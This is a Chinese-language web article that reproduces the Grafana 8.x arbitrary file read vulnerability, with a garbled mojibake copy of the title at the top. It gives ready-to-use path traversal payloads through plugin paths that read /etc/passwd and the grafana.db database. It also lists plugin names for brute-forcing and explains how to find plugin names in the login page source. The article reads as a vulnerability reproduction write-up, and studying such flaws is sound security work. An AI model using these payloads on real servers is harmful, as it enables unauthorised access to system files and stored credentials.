栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 前沿技术 > 大数据 > 大数据系统

grafana浠绘剰鏂囦欢璇诲彇婕忔礊澶嶇幇(Grafana 任意文件读取漏洞复现)

grafana浠绘剰鏂囦欢璇诲彇婕忔礊澶嶇幇(Grafana 任意文件读取漏洞复现)

一、漏洞描述

Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件

二、漏洞影响

Grafana 8.x

三、漏洞复现

可以从登陆页面看到版本信息为 v8.2.4,此版本在漏洞射程范围之内

查看当前所使用的插件:

/api/plugins?embedded=0
http://10.10.12.120:443/api/plugins?embedded=0

读取 /etc/passwd文件

POC: /public/plugins/welcome/../../../../../../../../../etc/passwd

读取 db 文件

POC: /public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db

 

四、探测插件

因为环境的不同可能存在的插件也就不同

4.1 字典爆破

可以直接去官网爬取字典:https://grafana.com/grafana/plugins/

一些比较热门的插件字典

alertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline
text
4.2 页面抓取

查看网站登陆页面源代码,匹配关键字 public/app/plugins/panel/

猜测关键字后面的为插件名称,我们找个除了 welcome 这个插件的另外一个插件来测试

 

然后拼接 payload 为

/public/plugins/alertlist/../../../../../../../../../etc/passwd

 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/772051.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号